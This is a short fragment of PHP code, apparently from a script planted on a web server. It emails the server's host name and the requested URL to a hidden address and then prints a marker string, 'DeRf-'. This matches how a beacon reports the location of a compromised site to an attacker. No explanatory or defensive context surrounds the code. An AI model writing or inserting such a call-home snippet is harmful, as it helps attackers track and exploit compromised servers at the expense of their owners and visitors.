\r\n"; $html = ' '; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1"; if(mail($email1, $assunto, $html . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){ echo "DeRf-"; exit(); } else{ echo "DeRf- =("; exit(); } ?>